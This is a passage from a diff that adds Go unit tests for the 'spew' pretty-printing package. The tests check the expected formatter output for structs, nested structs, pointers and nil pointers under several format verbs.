+ addFormatterTest("%+v", nv4, "<nil>")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "<nil>")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s2)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s2)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s2)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s2)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s2)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s2)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+}
+
+func addStructFormatterTests() {
+ // Struct with primitives.
+ type s1 struct {
+ a int8
+ b uint8
+ }
+ v := s1{127, 255}
+ nv := (*s1)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.s1"
+ vt2 := "int8"
+ vt3 := "uint8"
+ vs := "{127 255}"
+ vs2 := "{a:127 b:255}"
+ vs3 := "{a:(" + vt2 + ")127 b:(" + vt3 + ")255}"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%+v", v, vs2)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs2)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs2)
+ addFormatterTest("%+v", nv, "<nil>")
+ addFormatterTest("%#v", v, "("+vt+")"+vs3)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs3)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs3)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs3)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs3)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs3)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+ // Struct that contains another struct.
+ type s2 struct {
+ s1 s1
+ b bool
+ }
+ v2 := s2{s1{127, 255}, true}
+ nv2 := (*s2)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.s2"
+ v2t2 := "spew_test.s1"
+ v2t3 := "int8"
+ v2t4 := "uint8"
+ v2t5 := "bool"
+ v2s := "{{127 255} true}"
+ v2s2 := "{s1:{a:127 b:255} b:true}"
+ v2s3 := "{s1:(" + v2t2 + "){a:(" + v2t3 + ")127 b:(" + v2t4 + ")255} b:(" +
+ v2t5 + ")true}"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%+v", v2, v2s2)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s2)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s2)
+ addFormatterTest("%+v", nv2, "<nil>")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s3)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s3)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s3)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")